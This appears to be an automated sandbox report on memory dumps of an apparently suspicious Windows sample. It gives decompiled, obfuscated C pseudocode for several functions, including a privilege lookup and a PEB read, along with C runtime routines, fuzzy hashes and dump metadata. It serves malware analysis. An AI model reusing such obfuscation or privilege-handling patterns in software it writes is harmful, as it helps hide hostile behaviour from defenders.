0x00855d02
0x00855d11
0x00855d14
0x00855d1e
0x00855d35
0x00855d45
0x00855d4d
0x00855d93
0x00855d98
0x00855da5
0x00855db0
0x00855db3
0x00855dc0
0x00855dc5
0x00855dcc
0x00855dde
0x00855df7
0x00855e03
0x00855e06
0x00855e0e
0x00855e16
0x00855e1f
0x00855e2a
0x00855e36
0x00855e3b
0x00855e3e
0x00855e40
0x00855e40
0x00855e53
0x00855e5b
0x00855e68
0x00855e72
0x00855e84
0x00855e92
0x00855eb9
0x00855ec8
0x00855ecd
0x00855ed0
0x00855ed0
0x00855ed7
0x00855ee1
0x00855ee1
0x00855ee7
0x00855eec
0x00855ef3
0x00855ef6
0x00855f04
0x00855f13
0x00855f31
0x00855f45
0x00855f59
0x00855f72
0x00855f9c
0x00855fc2

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e25f6b37710d8091596f1755b74d781592d8a469cc52d3acd58c13f246b586
Instruction ID: d6acb2a1f5226e9e0dd4241d81cb2e0f64a39e333bcc50043045b68c0caf5756
Opcode Fuzzy Hash: d4e25f6b37710d8091596f1755b74d781592d8a469cc52d3acd58c13f246b586
Instruction Fuzzy Hash: 009115F7D106185BD710ABB8AC42A6E75A4FB65325B8A0230FC58F7392F9215E1487E3

Uniqueness

Uniqueness Score: -1.00%

Function 00843A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00843A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E00849C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E00849D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x8620d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x00843a39
0x00843a50
0x00843a5f
0x00843a61
0x00843a65
0x00843a68
0x00843a8b
0x00843a8e
0x00843a6a
0x00843a71
0x00843a76
0x00843a7b
0x00843a7d
0x00843a82
0x00843a86
0x00843a86
0x00843a91
0x00843a94
0x00843aa0
0x00843ab2
0x00843abb
0x00843ae0
0x00843abd
0x00843ac0
0x00843ac3
0x00843ac8
0x00843ad0
0x00843adb
0x00843adb
0x00843ac3
0x00843ae3
0x00843ae5
0x00843ae9
0x00843afa
0x00843aff
0x00843b01
0x00843b07
0x00843b19
0x00843b1b
0x00843b1e
0x00843b20
0x00843b28
0x00843b2b
0x00843b32
0x00843b5c
0x00843b63
0x00843b69
0x00843b6c
0x00843b77
0x00000000
0x00843b34
0x00843b34
0x00843b45
0x00843b79
0x00843b8c
0x00843b9d
0x00843b9d
0x00843b47
0x00843b5a
0x00843b9e
0x00000000
0x00843b9e
0x00000000
0x00843b5a

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae50161ce7376523b84617e1262dc5431d06291782c2bdfed05002d0105514d
Instruction ID: f33937d83072f6461dbdd613da724ce6f28756e6cec564f09f776d5464ed3370
Opcode Fuzzy Hash: fae50161ce7376523b84617e1262dc5431d06291782c2bdfed05002d0105514d
Instruction Fuzzy Hash: E6419672F001294B9B08CE69CCD25FFB7EAFBD8310B15806AE855E7351D574AE0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 00849A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00849A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E00847DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x862098 = _t68;
					return _t86;
				}
			}

0x00849a6c
0x00849a77
0x00849a88
0x00849a8a
0x00849a8a
0x00849a8c
0x00849a91
0x00849a96
0x00849a98
0x00849a9b
0x00849a9f
0x00849aa1
0x00849aa3
0x00849aa5
0x00849aa8
0x00849aab
0x00849aab
0x00849ac0
0x00849aeb
0x00849ac2
0x00849aca
0x00849ad4
0x00849ad6
0x00849ade
0x00849ae3
0x00849ae7
0x00849ae7
0x00849ad4
0x00849afb
0x00849b04
0x00849b06
0x00849b06
0x00849b0f
0x00849b14
0x00849b19
0x00849b2f
0x00849b46
0x00849b48
0x00849b52
0x00849b52
0x00849b57
0x00849b5a
0x00849b70
0x00849b7e
0x00849b83
0x00849b85
0x00849b88
0x00849b8a
0x00000000
0x00849b72
0x00849b75
0x00849b77
0x00000000
0x00000000
0x00849b79
0x00849b8c
0x00849b8f
0x00849b9d
0x00849b9d

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49ff53a824c2d7975857c05416b5f1c8e6085cd3a7957a832a19105e4c8b853c
Instruction ID: a4dae1e0713b675ed78908cbcb7266d3618f366c39be04bba7e7961da2596fdf
Opcode Fuzzy Hash: 49ff53a824c2d7975857c05416b5f1c8e6085cd3a7957a832a19105e4c8b853c
Instruction Fuzzy Hash: 99415333A406394B9B20CE6998911EFB7E6FFD8330B2A8525DC54FB344D674AD0687D0

Uniqueness

Uniqueness Score: -1.00%

Function 00858830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00858830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E008500D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E00859180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E0084ACF0(E00841460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E00841460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E00841460(__eflags, E008422E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E00841460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E00843750(__eflags, _t66, 0xffff);
						_t42 = E00849D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E00856B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x0085883c
0x00858841
0x00858844
0x00858846
0x00858849
0x0085889c
0x00000000
0x0085889c
0x0085884b
0x0085884f
0x00858854
0x00858857
0x0085885d
0x00858862
0x00000000
0x00000000
0x00858864
0x00858864
0x00858870
0x00858888
0x0085888d
0x00858892
0x00000000
0x00000000
0x00858894
0x00858897
0x0085889a
0x00000000
0x00000000
0x00000000
0x0085889a
0x008588c2
0x008588c8
0x008588cd
0x008588d0
0x008588d2
0x008588d5
0x008588d7
0x0085894a
0x00000000
0x0085894a
0x008588dc
0x008588df
0x008588e3
0x008588e3
0x008588e9
0x008588ec
0x008588f0
0x008588f8
0x00858905
0x00858910
0x00858915
0x0085891c
0x00858923
0x00858928
0x0085892e
0x00858933
0x00858935
0x00858937
0x0085893a
0x00000000
0x00000000
0x0085893f
0x00858943
0x00858946
0x00858948
0x00000000
0x00000000
0x00000000
0x00858948
0x00000000
0x00858951
0x008588a5

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction ID: 1006b1771e58887717bdf324b0a7e43e5436082483a1fbcea406c8e6b7c21b0a
Opcode Fuzzy Hash: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction Fuzzy Hash: E231D6B6E0011A9BDB109A64EC42ABA7769FF40319F450035ED08FB342FB31DD18C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00849C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00849C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E00847DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x862100 = _t88;
				return _v32;
			}

0x00849c69
0x00849c73
0x00849c7c
0x00849c85
0x00849c89
0x00849c94
0x00849c9f
0x00849ca4
0x00849ca7
0x00849ca9
0x00849c8b
0x00849c8b
0x00849c8d
0x00849c8d
0x00849cb0
0x00849cb3
0x00849cb5
0x00849cb5
0x00849cbe
0x00849cc4
0x00849cc7
0x00849cc9
0x00849ccb
0x00849cd0
0x00849cd3
0x00849ce3
0x00849ce5
0x00849cea
0x00849ced
0x00849cfa
0x00849cfd
0x00849cff
0x00849d1e
0x00849d38
0x00849d01
0x00849d0b
0x00849d0d
0x00000000
0x00000000
0x00849d0d
0x00849d3a
0x00849d4a

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9cbddfd69e4371703a3e143e6935a3329c06764a5be217999b69c685e2597f
Instruction ID: ef23ec60df20ae563bbb3d2f81f83d106467b5a6d06e881b6b33bc0632f6d9b9
Opcode Fuzzy Hash: 3d9cbddfd69e4371703a3e143e6935a3329c06764a5be217999b69c685e2597f
Instruction Fuzzy Hash: 4831C331F000195B9B0CCE6DD8D25BFBBEBEBC4311B14C12FE849DB298D9709A068781

Uniqueness

Uniqueness Score: -1.00%

Function 00920865, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2156247701.0000000000920000.00000040.00020000.sdmp, Offset: 00920000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: ae38561dd335b2eed01ff1d3195921b708b1857a567934753145170b989037b9
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 851172733402109FD714DE55EC81FA7B39AEBD83307298165ED04CB31AD676E84187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00920C5E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2156247701.0000000000920000.00000040.00020000.sdmp, Offset: 00920000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 1d9ffde01b154501aeb28c275306bc69d06eddf0d55068f13c2dd753a3f66b15
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 830192B73052508FD719CF29E984D79BBE8EBC5720B19817EC5868761BD124E845C560

Uniqueness

Uniqueness Score: -1.00%

Function 0085CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E00849D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x0085ce46
0x0085ce49
0x0085ce4e
0x0085ce50
0x0085ce53
0x0085ce5a
0x0085ce60
0x0085ce60
0x0085ce63
0x0085ce6e
0x0085ce8a
0x0085ce70
0x0085ce75
0x0085ce7a
0x0085ce7d
0x0085ce86
0x00000000
0x00000000
0x0085ce88
0x0085ce86
0x0085ce6e
0x0085ce92

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction ID: cf9c840c6e95d6352f3ea28f9e88aea3ee06e3b9cf5c82894c384d1cee0ba956
Opcode Fuzzy Hash: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction Fuzzy Hash: 1EF0A762E403289AE7315E59E887867F3B5FB51765F598029DC09E3240A2B16CCCCAD1

Uniqueness

Uniqueness Score: -1.00%

Function 00852EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00852EF0() {

				return  *[fs:0x30];
			}

0x00852ef6

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009086D9, Relevance: 19.6, APIs: 13, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0091CB9C,?,00906F6A), ref: 009086DF
__mtterm.LIBCMT ref: 009086EB

Part of subcall function 009083C3: __decode_pointer.LIBCMT ref: 009083D4
Part of subcall function 009083C3: TlsFree.KERNEL32(0091F0B8,00907006), ref: 009083EE

TlsAlloc.KERNEL32 ref: 00908778
__init_pointers.LIBCMT ref: 0090879D
__encode_pointer.LIBCMT ref: 009087A8
__encode_pointer.LIBCMT ref: 009087B8
__encode_pointer.LIBCMT ref: 009087C8
__encode_pointer.LIBCMT ref: 009087D8
__decode_pointer.LIBCMT ref: 009087F9
__calloc_crt.LIBCMT ref: 00908812
__decode_pointer.LIBCMT ref: 0090882C
GetCurrentThreadId.KERNEL32 ref: 00908842

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
String ID:
API String ID: 802150526-0
Opcode ID: 1525290e6db4e23779929a5e440164636598c29b841dc995d6bb29e877ce9c77
Instruction ID: acbb27cb06057397b1f1732c2ca93646efc59858494e5d126355424985962707
Opcode Fuzzy Hash: 1525290e6db4e23779929a5e440164636598c29b841dc995d6bb29e877ce9c77
Instruction Fuzzy Hash: 2531B671B69304DECB10AF75BC0AB573BA4EB84B54712892AF4A0D22F1DF75A580EF50

Uniqueness

Uniqueness Score: -1.00%

Function 0090885D, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0090887B

Part of subcall function 0090B081: __mtinitlocknum.LIBCMT ref: 0090B095
Part of subcall function 0090B081: __amsg_exit.LIBCMT ref: 0090B0A1
Part of subcall function 0090B081: RtlEnterCriticalSection.NTDLL(?), ref: 0090B0A9

___sbh_find_block.LIBCMT ref: 00908886
___sbh_free_block.LIBCMT ref: 00908895
HeapFree.KERNEL32(00000000,?,0091DDA8), ref: 009088C5
GetLastError.KERNEL32(?,009088F8,?,00000001,?,0090B00B,00000018,0091DE68,0000000C,0090B09A,?,?,?,009085D2,0000000D,0091DD80), ref: 009088D6

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 70773756eaddabd2214cd2cac22909e0991b4a43f3e38f5f82a79ab7f1ce879f
Instruction ID: 71124827526737ee7015acd9336ae8769f0965969cbcd18606d19813227ae195
Opcode Fuzzy Hash: 70773756eaddabd2214cd2cac22909e0991b4a43f3e38f5f82a79ab7f1ce879f
Instruction Fuzzy Hash: C0018B32B05301EEDB207BB0AC0675F7A689F84724F608119F964A60D1DF759981DB55

Uniqueness

Uniqueness Score: -1.00%

Function 008446E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008446E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x008446e7
0x008446ea
0x008446ed
0x008446f4
0x008446fa
0x008446ff
0x00844709
0x00844711
0x00844713
0x00844715
0x00844718
0x00844720
0x00844725
0x00844781
0x00844784
0x00844786
0x00844791
0x0084479a
0x0084479f
0x008447a1
0x008447a3
0x008447ab
0x00000000
0x00000000
0x0084472c
0x00844731
0x0084473a
0x008447ad
0x008447ad
0x008447b6
0x008447ca
0x008447ca
0x008447cd
0x008447d1
0x008447e2
0x008447e7
